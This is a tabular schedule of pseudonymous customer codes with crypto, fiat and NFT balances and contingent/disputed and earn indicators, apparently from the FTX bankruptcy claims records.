| 07383298 | | BTC[0], DOGE[1.00004524], USD[0.04] | | |
| 07383299 | | BRZ[1], CUSDT[7], USD[0.01] | | |
| 07383303 | | DOGE[28.94385242], USD[0.00] | | |
| 07383304 | | SHIB[1259.79808612], USD[0.00] | Yes | |
| 07383305 | | USD[10.00] | | |
| 07383306 | | USD[10.00] | | |
| 07383307 | | USD[10.00] | | |
| 07383308 | | DOGE[2470.7654402], USD[210.00] | | |
| 07383309 | | BTC[0], CUSDT[1], USD[0.00] | | |
| 07383310 | | BCH[.00081845], DOGE[49.912], ETHW[.583], LINK[.27719], SUSHI[4.758225], USD[0.00], USDT[0] | | |
| 07383311 | | DOGE[0], TRX[0], USD[0.00], USDT[0] | | |
| 07383312 | | USD[10.00] | | |
| 07383313 | | USD[0.01], USDT[0] | Yes | |
| 07383315 | | DOGE[0], LTC[0], SOL[0], TRX[0], USD[56.42] | Yes | |
| 07383316 | | DOGE[308.49057457], TRX[115.43843633], USD[0.00] | | |
| 07383318 | | USD[10.00] | | |
| 07383319 | | USD[10.00] | | |
| 07383320 | | USD[10.00] | | |
| 07383321 | | BRZ[0], CUSDT[24.02620099], DOGE[0], ETH[0], TRX[0], USD[0.00] | | |
| 07383323 | | DOGE[137.54149798], USD[0.00] | | |
| 07383324 | | DOGE[191.93268536], USD[0.00] | | |
| 07383325 | | USD[0.00] | | |
| 07383326 | | USD[10.00] | | |
| 07383327 | | USD[10.00] | | |
| 07383328 | | BTC[.00000011], ETH[0], USD[0.00] | | |
| 07383329 | | USD[10.00] | | |
| 07383330 | | USD[10.00] | | |
| 07383332 | | BAT[5], BRZ[1], CUSDT[2], DAI[0], DOGE[1], SOL[0], TRX[0], USD[0.72], USDT[1] | | |
| 07383333 | | BRZ[1], USD[62.46] | | |
| 07383334 | | USD[10.00] | | |
| 07383335 | | USD[10.00] | | |
| 07383336 | | CUSDT[1], DOGE[1], TRX[1], USD[435.76], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07383338 | | BRZ[1], DOGE[1690.2924224], USD[110.57] | Yes | |
| 07383339 | | USD[10.00] | | |
| 07383340 | | BRZ[1], BTC[.0032009], CUSDT[4], DOGE[226.94016884], ETH[.01119731], ETHW[.01106051], SUSHI[.28540617], TRX[4], USD[8.68], USDT[0] | Yes | |
| 07383341 | | BTC[0], CUSDT[8], DOGE[2], ETH[.00000001], GRT[1], LTC[0], MATIC[0], NFT (349861545553443381/Barcelona Ticket Stub #1055)[1], NFT (467223533325595321/Entrance Voucher #3075)[1], SHIB[3], SOL[.00000001], TRX[4.01009042], USD[0.00] | Yes | |
| 07383343 | | CUSDT[1], USD[0.00] | | |
| 07383345 | | USD[10.00] | | |
| 07383347 | | CUSDT[1], DOGE[.95752346], TRX[1], USD[0.00] | | |
| 07383348 | | DOGE[2198.19401932], USD[0.00], USDT[0] | Yes | |
| 07383349 | | USD[10.00] | | |
| 07383351 | | USD[10.00] | | |
| 07383352 | | TRX[.0000314], USD[0.01] | | |
| 07383353 | | BRZ[1], CUSDT[2], DOGE[2], ETHW[.13026392], SHIB[1], TRX[1], USD[0.01] | Yes | |
| 07383354 | | DOGE[134.13603916], USD[0.00] | | |
| 07383356 | | USD[10.00] | | |
| 07383357 | | USD[10.00] | | |
| 07383358 | | CUSDT[1], SHIB[8711091.63100410], TRX[1], USD[0.00] | | |
| 07383359 | | USD[10.00] | | |
| 07383361 | | BAT[15.53613375], BRZ[2], BTC[.00000007], CUSDT[41], ETH[.00000472], ETHW[.51717809], SHIB[1391709.52845127], SOL[.00007605], TRX[2], USD[604.20], USDT[0.00019343] | Yes | |
| 07383362 | | DOGE[.00414915], SHIB[1383193.16023403], USD[0.00], USDT[0] | Yes | |
| 07383364 | | TRX[0], USD[0.01], USDT[0.00000001] | Yes | |
| 07383365 | | CUSDT[2], DOGE[7438.44272697], USD[0.00] | | |
| 07383367 | | BTC[0], TRX[0], USD[0.00], USDT[0.00000001] | | |
| 07383368 | | ETH[.001], ETHW[.001] | | |
| 07383370 | | AUD[0.00], BCH[0], BRZ[1.00020406], BTC[0], CUSDT[3], DAI[0], DOGE[0], GRT[0], PAXG[0], SOL[0], SUSHI[0], TRX[5], USD[0.01] | | |
| 07383372 | | DOGE[176.44507635], USD[0.00] | | |
| 07383374 | | DOGE[.00002794], USD[0.01] | Yes | |
| 07383376 | | CUSDT[1], ETH[0], USD[0.00] | | |
| 07383377 | | BTC[.0001304], CUSDT[1], DOGE[.97498913], USD[0.00] | | |
| 07383378 | | BTC[0], SOL[0], USD[0.89] | | |
| 07383380 | | USD[10.00] | | |
| 07383381 | | USD[10.00] | | |
| 07383383 | | USD[0.01] | | |
| 07383387 | | USD[10.00] | | |
| 07383388 | | DOGE[122.599622], USD[0.00] | | |
| 07383389 | | CUSDT[2], DOGE[1], LTC[.05272221], MATIC[234.12551836], SOL[17.25958046], SUSHI[26.94228472], TRX[1], USD[1.22] | Yes | |
| 07383390 | | USD[10.00] | | |
| 07383391 | | ETH[.00546036], ETHW[.00546036], USD[0.00] | | |
| 07383392 | | USD[10.00] | | |
| 07383393 | | BRZ[5], CUSDT[6], TRX[4], USD[0.01] | | |
| 07383394 | | DOGE[.4507], USD[0.10] | | |
| 07383395 | | BTC[.00006585], DOGE[2230.044] | | |
| 07383397 | | BRZ[3], CUSDT[3], DOGE[3.000548], TRX[2], USD[0.01] | | |
| 07383398 | | USD[10.00] | | |
| 07383399 | | BTC[.00010628], USD[0.00] | | |
| 07383400 | | DOGE[294.54139944], USD[66.80] | Yes | |
| 07383401 | | CUSDT[1], DOGE[591.53320146], TRX[1], USD[0.00] | | |
| 07383402 | | USD[10.00] | | |
| 07383403 | | BRZ[2], CUSDT[5], DOGE[1], ETH[.14356913], ETHW[.14356913], TRX[500.00387997], USD[0.00] | | |
| 07383404 | | USD[10.00] | | |
| 07383405 | | DOGE[52.78721068], USD[0.00] | | |
| 07383406 | | DOGE[137.19310588], USD[0.00] | | |
| 07383408 | | BTC[0], CUSDT[0], DOGE[0], ETH[.00000002], ETHW[0], TRX[0], USD[0.00] | | |
| 07383409 | | USD[10.00] | | |
| 07383411 | | CUSDT[952.1910992], TRX[227.18234484], USD[0.00] | | |
| 07383415 | | USD[0.00] | | |
| 07383416 | | DOGE[137.16533031], USD[0.00] | | |
| 07383419 | | BF_POINT[300], BTC[0], CAD[0.00], DOGE[0], ETH[0], SHIB[0], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07383420 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07383422 | Contingent, Disputed | AAVE[0], AUD[0.00], BAT[0], BCH[0], BF_POINT[200], BRZ[0], BTC[0], CAD[0.00], CUSDT[0], DAI[0], DOGE[0], ETH[0], GBP[0.00], LINK[0], LTC[0], MATIC[0], PAXG[0], SGD[0.00], SOL[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07383424 | | USD[10.00] | | |
| 07383426 | | CUSDT[1], DOGE[135.9614986], TRX[0.00002124], USD[0.00] | | |
| 07383428 | | DOGE[97.26719636], USD[2.33] | | |
| 07383429 | | USD[10.50] | | |
| 07383430 | | BRZ[1], BTC[.00475067], CUSDT[1], DOGE[2], ETH[.06400274], ETHW[.0632093], TRX[9817.32694775], USD[0.01] | Yes | |
| 07383431 | | USD[0.02] | | |
| 07383432 | | TRX[223.24782271], USD[0.00] | | |
| 07383433 | | CUSDT[0], ETH[0], SHIB[1], SOL[0.95463696], USD[0.00] | Yes | |
| 07383434 | | DOGE[140.52017195], USD[0.00] | | |
| 07383435 | | USD[0.01] | | |
| 07383436 | | DOGE[146.58296779], USD[0.00] | | |
| 07383437 | | BTC[0], ETH[0], ETHW[0], GRT[0], TRX[0], USD[0.00] | | |
| 07383438 | | BCH[.01961399], BRZ[64.8067713], BTC[.00064878], CUSDT[591.89167081], DOGE[2031.06371324], ETH[.02433199], ETHW[.02403103], GRT[11.94921773], KSHIB[2095.47872144], MATIC[13.10846178], SHIB[1519400.21864684], SOL[.12556075], SUSHI[1.11512953], TRX[3.0000042], UNI[.7461878], USD[4.55] | Yes | |
| 07383439 | | USD[41.40] | | |
| 07383440 | | USD[10.00] | | |
| 07383441 | | USD[10.00] | | |
| 07383442 | | DOGE[2], USD[0.01] | | |
| 07383443 | | BAT[1], BRZ[1], DOGE[2], SHIB[779.66721295], TRX[6], USD[0.00] | | |
| 07383444 | | USD[10.00] | | |
| 07383446 | | USD[10.00] | | |
| 07383447 | Contingent, Disputed | USD[10.00] | | |
| 07383448 | | BAT[1], BTC[0], CUSDT[9], DOGE[16], TRX[3], USD[0.00] | | |
| 07383451 | | DOGE[0], ETHW[.141], SOL[0], USD[823.96], USDT[0] | | |
| 07383452 | | BTC[.0001717], USD[0.00] | | |
| 07383453 | | CUSDT[2], DOGE[205.02658699], TRX[161.63836829], USD[0.00] | Yes | |
| 07383454 | | ETH[.1], ETHW[.1] | | |
| 07383455 | | USD[0.00] | | |
| 07383456 | | USD[10.00] | | |
| 07383458 | | CUSDT[1], DOGE[168.60327194], USD[0.00] | | |
| 07383459 | | USD[10.00] | | |
| 07383460 | | USD[10.00] | | |
| 07383461 | | DOGE[369.71346407], USD[0.01], USDT[1] | | |
| 07383462 | | CUSDT[36], DOGE[4550.22618997], TRX[2597.64201713], USD[0.00] | Yes | |
| 07383463 | | BTC[.00004239], USD[8.00] | | |
| 07383464 | | BRZ[2], CUSDT[2], DOGE[0], ETH[0], NFT (42648449532185023/Coachella x FTX Weekend 1 #18865)[1], USD[1.69], USDT[1] | | |
| 07383465 | | USD[10.00] | | |
| 07383466 | | DOGE[139.05620053], USD[0.00] | | |
| 07383467 | | BRZ[1], CUSDT[1], DOGE[4], ETH[.0575598], ETHW[.0575598], GRT[41.22595562], SOL[21.70426319], TRX[4], UNI[.00008784], USD[0.00], USDT[1] | | |
| 07383468 | | USD[10.00] | | |
| 07383469 | | BTC[0], CUSDT[2], DOGE[117.02540309], USD[0.00] | Yes | |
| 07383470 | | USD[10.00] | | |
| 07383472 | | CUSDT[0], DOGE[0], USD[0.00] | | |
| 07383473 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07383474 | | CUSDT[2], DOGE[4], USD[0.01], USDT[1] | | |
| 07383475 | | BRZ[2], CUSDT[2], DOGE[1], GRT[2], TRX[6], USD[0.01], USDT[2] | | |
| 07383476 | | CUSDT[1], DOGE[65.1965112], USD[4.72] | | |
| 07383479 | | BRZ[1], DOGE[7671.31029378], TRX[8.00087675], UNI[0], USD[0.00] | Yes | |
| 07383480 | | BRZ[54.6238648], BTC[.04306699], DOGE[3], SHIB[2], SOL[80.73698753], TRX[4], USD[0.00] | | |
| 07383481 | | DOGE[39.18964744], USD[0.00] | | |
| 07383482 | | USD[10.00] | | |
| 07383485 | | DOGE[.8788], USD[0.00] | | |
| 07383487 | | ALGO[34.06915984], BAT[31.67253895], BRZ[1], BTC[.01182451], CUSDT[15], DOGE[10], ETH[.05524942], ETHW[.05524942], GRT[335.90878927], KSHIB[2434.3572593], LINK[2.08818022], LTC[.28049818], MATIC[23.83063957], NEAR[3.82096042], SHIB[9276653.91616435], SOL[2.92651365], SUSHI[35.81095056], TRX[7], USD[0.00], YFI[.0127] | | |
| 07383488 | | USD[10.00] | | |
| 07383489 | | DOGE[1], USD[0.00] | | |
| 07383490 | | BTC[0.00000013], USD[0.00] | | |
| 07383492 | | BTC[.00020924], CUSDT[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07383493 | | BTC[0], NFT (301862257847326092/Fortune Cookies #1263)[1], NFT (335597902921393561/Humpty Dumpty #88)[1], NFT (575920733475692829/Skully Boys #3719)[1], TRX[.00034], USD[0.00], USDT[0] | | |
| 07383494 | | USD[10.00] | | |
| 07383495 | | USD[10.00] | | |
| 07383496 | | USD[10.00] | | |
| 07383499 | | SUSHI[.234] | | |
| 07383500 | | USD[10.00] | | |
| 07383501 | | CUSDT[1], DOGE[1106.40173536], TRX[1], USD[0.00] | | |
| 07383502 | | DOGE[141.68068715], USD[0.00] | | |
| 07383506 | | DOGE[1], USD[0.01] | | |
| 07383508 | | BAT[1], CUSDT[2], TRX[1], USD[0.01] | | |
| 07383509 | | DOGE[122.74657239], USD[0.00] | | |
| 07383510 | | USD[10.00] | | |
| 07383512 | | USD[10.00] | | |
| 07383514 | | DOGE[134.3900332], USD[0.00] | | |
| 07383515 | | CUSDT[235.17447933], DOGE[390.50118956], USD[3.00] | | |
| 07383517 | | USD[10.00] | | |
| 07383518 | | ETH[.00672823], ETHW[.00672823], USD[0.00] | | |
| 07383519 | | USD[10.00] | | |
| 07383521 | | USD[0.00] | Yes | |
| 07383522 | | BRZ[1], CUSDT[14], DOGE[1664.31433296], TRX[.00778599], USD[0.00] | Yes | |
| 07383524 | | CUSDT[2], DOGE[393.82628167], USD[0.00] | | |
| 07383525 | | TRX[3066.6713], USDT[26.95672700] | | |
| 07383526 | | BTC[.0000949], DOGE[1818.509], USD[0.31], USDT[0.14249600] | | |
| 07383527 | | BAT[0], BRZ[0], CUSDT[2], DOGE[0], ETH[0], GRT[0], NFT (506557205026684635/Entrance Voucher #3502)[1], SOL[0], USD[0.00] | Yes | |
| 07383528 | | USD[10.00] | | |
| 07383529 | | DOGE[138.71222144], USD[3.00] | | |
| 07383530 | | USD[10.00] | | |
| 07383531 | | DOGE[0], ETH[0], LTC[0], TRX[0], UNI[0], USD[0.00] | | |
| 07383532 | | BTC[0], DOGE[1.00000226], USD[0.00] | | |
| 07383533 | | DOGE[134.30646425], USD[0.00] | | |
| 07383534 | | BTC[0], DAI[0], DOGE[3], ETH[0], GRT[1], LTC[0], SHIB[5], SOL[0.00000001], SUSHI[0], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07383535 | | USD[0.00] | Yes | |
| 07383536 | | USD[10.62] | Yes | |
| 07383537 | | CUSDT[1], DOGE[1], USD[0.00] | Yes | |
| 07383538 | | USD[10.00] | | |
| 07383539 | | BRZ[1], DOGE[6018.18333914], USD[10.00] | | |
| 07383541 | | DOGE[.00000674], USD[0.00] | | |
| 07383542 | | ETH[.0000001], NFT (336824906110971011/The Hill by FTX #8713)[1], NFT (424217916447133432/Australia Ticket Stub #2185)[1], SHIB[4984.29868114], USD[0.00], USDT[0] | Yes | |
| 07383543 | | CUSDT[1], ETH[0], ETHW[0.11319853], SHIB[4603.55299128], TRX[654.23987807], USD[0.00] | Yes | |
| 07383545 | | USD[0.00] | | |
| 07383546 | | USD[10.00] | | |
| 07383547 | | DOGE[14.25419026], TRX[165.52573644], USD[0.00] | | |
| 07383548 | | USD[1.09] | | |
| 07383550 | | USD[10.00] | | |
| 07383552 | | CUSDT[2], DOGE[61.23640443], USD[0.00] | | |
| 07383553 | | USD[10.00] | | |
| 07383554 | | CUSDT[2], DOGE[170.00001042], SHIB[957286.50532387], TRX[106.88281011], USD[0.00] | | |
| 07383555 | | USD[10.00] | | |
| 07383556 | | BRZ[1], DOGE[.55508566], MATIC[1.50209966], SHIB[5318917.9864727], SOL[1.87662836], SUSHI[61.9094673], USD[0.05] | Yes | |
| 07383558 | | BTC[.00090437], CUSDT[2], DOGE[1167.72830612], USD[0.00] | Yes | |
| 07383559 | | TRX[3.37842329], USD[0.00] | | |
| 07383560 | | BAT[108.92781954], CUSDT[4], DOGE[577.9961082], SHIB[246327.91677155], TRX[1086.46251075], USD[0.00] | Yes | |
| 07383561 | | CUSDT[1], DOGE[134.94069289], USD[0.00] | | |
| 07383563 | | DOGE[152.64225265], USD[0.00] | | |
| 07383564 | | BRZ[1], DOGE[1], TRX[1], USD[0.00], USDT[0] | | |
| 07383567 | | DOGE[1379.17720326], TRX[1], USD[0.00] | | |
| 07383568 | | BTC[.00021404], DOGE[1683.27149022], USD[0.01] | | |
| 07383569 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07383570 | | BRZ[2], CUSDT[9], DOGE[.05372089], GRT[4.23711706], TRX[4], USD[0.01], USDT[2.18014059] | Yes | |
| 07383571 | | USD[10.00] | | |
| 07383573 | | USD[10.00] | | |
| 07383574 | | USD[10.00] | | |
| 07383575 | | CUSDT[1], DOGE[3], UNI[.23774207], USD[0.00] | | |
| 07383576 | | USD[10.00] | | |
| 07383577 | | USD[10.00] | | |
| 07383578 | | TRX[81.54093448], USD[0.00] | | |
| 07383580 | | BRZ[3], CUSDT[7], TRX[311.39319552], USD[0.00] | Yes | |
| 07383583 | | USD[10.00] | | |
| 07383584 | | CUSDT[2], DOGE[2635.02956391], USD[0.01], USDT[1] | | |
| 07383585 | | DOGE[0], USD[0.72] | Yes | |
| 07383588 | | USD[10.00] | | |
| 07383589 | | USD[10.00] | | |
| 07383590 | | CUSDT[3], DOGE[1.37787547], SOL[.00003421], TRX[1], USD[0.00] | | |
| 07383591 | | BRZ[1], CUSDT[4], DOGE[4], ETH[.00000001], TRX[6], USD[0.00], USDT[0.00000001] | Yes | |
| 07383592 | | CUSDT[0], USD[0.00] | Yes | |
| 07383593 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07383594 | | BRZ[1], CUSDT[13], DOGE[20.67470726], SHIB[309564.63791611], TRX[1], USD[0.51] | Yes | |
| 07383597 | | USD[10.00] | | |
| 07383598 | | CUSDT[5], DOGE[7.35757574], ETH[.0797396], ETHW[.0797396], TRX[1], USD[0.00] | | |
| 07383599 | | DOGE[816.39205694], USD[0.00] | Yes | |
| 07383601 | | BCH[0.00019626], BRZ[1], CUSDT[3], DOGE[0.00002465], TRX[.00451838], USD[0.00] | | |
| 07383602 | | USD[0.00] | | |
| 07383603 | | USD[10.00] | | |
| 07383604 | | SOL[0], USD[107.04] | | |
| 07383605 | | USD[10.00] | | |
| 07383606 | | CUSDT[9], ETH[0], USD[0.00] | | |
| 07383607 | | DOGE[149.2018002], USD[0.00] | | |
| 07383608 | | USD[10.00] | | |
| 07383609 | | USD[10.00] | | |
| 07383610 | | ETH[0], SHIB[1], USD[0.00] | Yes | |
| 07383611 | | USD[10.00] | | |
| 07383612 | | CUSDT[1], DOGE[606.13732573], TRX[870.46763877], USD[0.00] | | |
| 07383613 | | BTC[.00021054], USD[0.00] | | |
| 07383614 | | USD[10.00] | | |
| 07383615 | | BRZ[1], CUSDT[5], DOGE[5], ETH[.10177319], ETHW[.10177319], SOL[2.02285043], TRX[2], USD[0.00] | | |
| 07383616 | | DOGE[171.10604142], USD[10.00] | | |
| 07383617 | | TRX[173.66284816], USD[0.00] | | |
| 07383618 | | BRZ[1], CUSDT[7], DOGE[3317.81428583], GRT[.40880867], LTC[5.01324505], TRX[1], USD[0.85] | | |
| 07383620 | | USD[10.00] | | |
| 07383622 | | USD[10.00] | | |
| 07383623 | | BCH[0], BRZ[0], DOGE[0], ETH[0], ETHW[0.14817161], LTC[0], NFT (524437958115760945/Entrance Voucher #2028)[1], SHIB[5], SUSHI[0], USD[272.49], USDT[0.00000001] | Yes | |
| 07383624 | | DOGE[16771.03699763], SHIB[930854.7125806], USD[0.00], USDT[0] | | |
| 07383625 | | BRZ[1], CUSDT[7], DOGE[127.02252706], TRX[120.78877857], USD[0.00] | Yes | |
| 07383626 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07383627 | | CUSDT[23.77714565], TRX[193.805028], USD[0.00] | | |
| 07383628 | | ALGO[282.69466511], AUD[0.00], BAT[0], BTC[0], CAD[0.00], CUSDT[7], DOGE[4], PAXG[0], SGD[0.00], SHIB[3], SOL[0], SUSHI[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07383629 | | BTC[0], SOL[0.00096910], USD[264.43], USDT[.00338925] | | |
| 07383630 | | USD[10.00] | | |
| 07383631 | | USD[10.00] | | |
| 07383632 | | USD[10.00] | | |
| 07383633 | | CUSDT[2], DOGE[4144.18550377], USD[0.00] | Yes | |
| 07383634 | | BCH[.00000072], DOGE[2], SHIB[20365305.80400608], TRX[.01302612], USD[0.06] | Yes | |
| 07383635 | | CUSDT[4], USD[101.83] | | |
| 07383637 | | BF_POINT[300], DOGE[1], TRX[25.79487837], USD[0.00] | Yes | |
| 07383638 | | DOGE[125.85342782], USD[0.00] | | |
| 07383639 | | BTC[.0095741], CUSDT[1], DOGE[6.00249504], GRT[1], USD[0.00], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07383640 | | CUSDT[36], DOGE[1], ETH[0], ETHW[0], LINK[0], LTC[0], SOL[0.00003784], USD[0.00], USDT[0.00000001] | Yes | |
| 07383641 | | USD[0.00] | | |
| 07383642 | | ALGO[61.68915523], AVAX[3.47725646], BTC[.00150176], DOGE[265.37472818], ETH[.3689603], ETHW[5.76930641], KSHIB[1297.12959222], LINK[3.33890862], LTC[1.40662344], MATIC[33.6350105], MKR[.09331005], NFT (338987916539280544/3D CATPUNK #921)[1], NFT (342839407344001253/The Hill by FTX #763)[1], NFT (516951455886856873/3D SOLDIER #1135)[1], NFT (528663328491168217/Ape MAN#79#1)[1], SHIB[17163814.25592544], SOL[4.36832972], SUSHI[14.9878969], USD[16.79], YFI[.0675376] | Yes | |
| 07383643 | | DOGE[0], USD[0.01], USDT[0] | | |
| 07383644 | | GRT[4.32675649], TRX[1], USD[0.00] | | |
| 07383645 | | LINK[.32602391], USD[0.00] | | |
| 07383646 | | DOGE[18.85348984], USD[0.01] | | |
| 07383647 | | USD[0.14] | | |
| 07383651 | | USD[10.00] | | |
| 07383653 | | CUSDT[140.27388259], DOGE[102.64693754], SOL[.13295715], SUSHI[.22319228], USD[0.00] | | |
| 07383654 | | DOGE[3.000548], LTC[.08600559], TRX[383.92447499], USD[0.00] | Yes | |
| 07383657 | | CUSDT[5], DOGE[1], USD[0.00] | | |
| 07383658 | | GRT[3.993993], USD[0.00] | | |
| 07383659 | | DOGE[23.47377918], TRX[1], USD[0.02] | | |
| 07383660 | | USD[10.00] | | |
| 07383662 | | USD[10.00] | | |
| 07383663 | | USD[10.00] | | |
| 07383664 | | USD[10.00] | | |
| 07383665 | | USD[10.00] | | |
| 07383666 | | DOGE[641.58], USD[0.14] | | |
| 07383667 | | BTC[0], CUSDT[1], DOGE[2], ETH[0], SHIB[2], SOL[0], TRX[2], USD[0.00] | Yes | |
| 07383669 | | USD[10.00] | | |
| 07383670 | | DOGE[122.94615376], USD[0.00] | | |
| 07383671 | | CUSDT[2], DOGE[1740.99066419], TRX[199.63869389], USD[0.00] | | |
| 07383672 | | TRX[3], USD[0.01] | | |
| 07383673 | | USD[0.00] | Yes | |
| 07383674 | | USD[10.85] | Yes | |
| 07383675 | | BTC[0.00001834], DOGE[73.704], ETH[.000796], ETHW[.000796], SUSHI[.448], USD[0.08] | | |
| 07383676 | | DOGE[133.94505145], USD[0.00] | | |
| 07383678 | | USD[10.00] | | |
| 07383679 | | USD[0.00] | | |
| 07383681 | | USD[10.00] | | |
| 07383683 | | ETH[0.15650340], ETHW[0.15650340], TRX[1], USD[0.00] | | |
| 07383684 | | DOGE[1150.23390952], ETH[0], USD[0.00] | Yes | |
| 07383685 | | TRX[3], USD[9.00] | | |
| 07383686 | | CUSDT[2], USD[0.00] | | |
| 07383687 | | DOGE[132.25378973], USD[0.00] | | |
| 07383688 | | USD[0.00] | | |
| 07383689 | | USD[10.00] | | |
| 07383690 | | USD[10.00] | | |
| 07383691 | | BRZ[1], CUSDT[5], DOGE[0], TRX[2], USD[0.00] | | |
| 07383692 | | DOGE[183.85383706], USD[0.00] | Yes | |
| 07383693 | | ETH[0.00000022], ETHW[2.17420477], SHIB[2], SOL[0], USD[29.33], USDT[0] | Yes | |
| 07383694 | | USD[10.00] | | |
| 07383695 | | DOGE[142.86983017], USD[0.00] | | |
| 07383696 | | USD[10.00] | | |
| 07383697 | | DOGE[133.52022604], USD[0.00] | | |
| 07383699 | | USD[10.00] | | |
| 07383700 | | USD[10.00] | | |
| 07383701 | | USD[10.00] | | |
| 07383702 | | USD[10.00] | | |
| 07383703 | | DOGE[0], TRX[1], USD[0.01] | Yes | |
| 07383704 | | BRZ[1], DOGE[4922.7069703], GRT[1], USD[0.00] | | |
| 07383707 | | USD[10.00] | | |
| 07383708 | | DOGE[131.71594928], USD[0.00] | | |
| 07383709 | | CUSDT[1], TRX[2], USD[0.01] | | |
| 07383710 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07383711 | | USD[10.00] | | |
| 07383712 | | MATIC[0], SOL[0.84525696], USD[0.01] | | |
| 07383713 | | DOGE[2441.6387835], USD[216.49] | | |
| 07383716 | | USD[10.00] | | |
| 07383717 | | DOGE[9.44535585], USD[5.00] | | |
| 07383718 | | BRZ[2], CUSDT[14], LINK[.00034052], TRX[2], USD[1.54], USDT[0.00000001] | Yes | |
| 07383719 | | USD[10.00] | | |
| 07383722 | | USD[10.00] | | |
| 07383723 | | USD[10.00] | | |
| 07383724 | | USD[0.00] | | |
| 07383726 | | CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07383727 | | CUSDT[1], DOGE[134.54809882], USD[0.00] | | |
| 07383729 | | USD[0.00] | | |
| 07383730 | | BRZ[1], CUSDT[10], DOGE[183.43001315], USD[0.00] | Yes | |
| 07383731 | | DOGE[160.54835612], USD[0.00] | | |
| 07383732 | | DOGE[146.99304414], USD[0.00] | | |
| 07383734 | | BAT[1.00928398], BF_POINT[100], BRZ[6.3960293], CUSDT[10], ETHW[4.71698068], GRT[2.02186454], SUSHI[.00154727], TRX[13.06180837], USD[663.82] | Yes | |
| 07383735 | | DOGE[113.49109531], MATIC[.00008526], SHIB[491713.76395765], TRX[1], USD[0.00] | Yes | |
| 07383736 | | BTC[.00008052], USD[0.00] | | |
| 07383737 | | USD[10.00] | | |
| 07383738 | | USD[10.00] | | |
| 07383739 | | USD[10.00] | | |
| 07383741 | | BAT[.00352556], CAD[0.00], CUSDT[1.00004051], DOGE[2.00032939], TRX[3.68443856], USD[0.00], USDT[0] | Yes | |
| 07383742 | | BTC[0], ETH[0], GRT[0], SOL[0], SUSHI[0] | | |
| 07383743 | | BTC[0], DOGE[0], ETH[0], ETHW[0], USD[0.00], USDT[0] | | |
| 07383744 | | BTC[0], DOGE[2.41757901], SUSHI[0], USD[0.00], USDT[0] | Yes | |
| 07383745 | | DOGE[.00115196], USD[0.00] | Yes | |
| 07383746 | | DAI[3.46424978], DOGE[13.55884218], ETH[.00163522], ETHW[.00163522], SOL[.10952824], SUSHI[.13489162], TRX[1], USD[0.00] | | |
| 07383747 | | DOGE[109.12553338], USD[0.02] | | |
| 07383748 | | USD[10.00] | | |
| 07383749 | | USD[10.00] | | |
| 07383750 | | CUSDT[2], TRX[510.34071684], USD[0.00] | | |
| 07383751 | | DOGE[2484.213], USD[0.03] | | |
| 07383752 | | USD[10.00] | | |
| 07383753 | | CUSDT[1.00009513], DOGE[.00009139], SHIB[5694.76082004], TRX[.00000001], USD[0.00] | | |
| 07383754 | | BAT[1], BRZ[4], BTC[.00000012], CUSDT[16], DOGE[.0283316], ETH[.00648642], ETHW[.00648642], GRT[2.02995592], LINK[.0000428], SOL[.00036636], SUSHI[.00678879], TRX[2.23839505], USD[0.13], USDT[0] | | |
| 07383755 | | DOGE[141.19027069], TRX[1], USD[0.00] | | |
| 07383757 | | USD[10.00] | | |
| 07383758 | | DOGE[14.67881332], USD[0.00] | | |
| 07383759 | | CUSDT[3], TRX[2], USD[0.00] | Yes | |
| 07383760 | | BRZ[3], BTC[0], DOGE[1], ETH[0], ETHW[0], NEAR[5.32827392], NFT (548949636985680542/CloudNFT Series 1 #18)[1], SHIB[14], TRX[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07383762 | | USD[10.00] | | |
| 07383764 | | BRZ[1], DOGE[2], LINK[19.95549561], LTC[1.00673121], SUSHI[9.70273395], TRX[1], USD[0.00] | | |
| 07383765 | | TRX[.000005], USD[0.00] | | |
| 07383766 | | DOGE[124.77436116], USD[0.00] | | |
| 07383767 | | DOGE[152.08401485], USD[0.00] | | |
| 07383768 | | BAT[1.01655549], BRZ[1], CUSDT[8], DOGE[.02453212], SHIB[1158917.64133691], SOL[0], TRX[2.00302901], USD[0.01], USDT[1.01941897] | Yes | |
| 07383770 | | USD[0.00] | | |
| 07383772 | | DOGE[82.90273782], GRT[24.30716808], TRX[67.13230979], USD[0.00] | | |
| 07383773 | | USD[10.00] | | |
| 07383774 | | USD[10.00] | | |
| 07383775 | | BTC[.00019739], CUSDT[2], DOGE[636.09006191], ETH[.0062365], ETHW[.00615442], USD[0.00], USDT[22.04728983] | Yes | |
| 07383777 | | USD[10.00] | | |
| 07383778 | | SOL[.02044816], TRX[208.67983467], USD[0.00] | | |
| 07383779 | | AVAX[.00603197], BTC[.00001192], ETH[0.00048569], ETHW[0.00048569], LTC[0], MATIC[.84], SOL[0.0304993], SUSHI[0], UNI[0], USD[0.00], USDT[1.16294105] | | |
| 07383781 | | CUSDT[2], DOGE[52.64942878], USD[0.00] | | |
| 07383782 | | TRX[209.43083818], USD[0.00] | | |
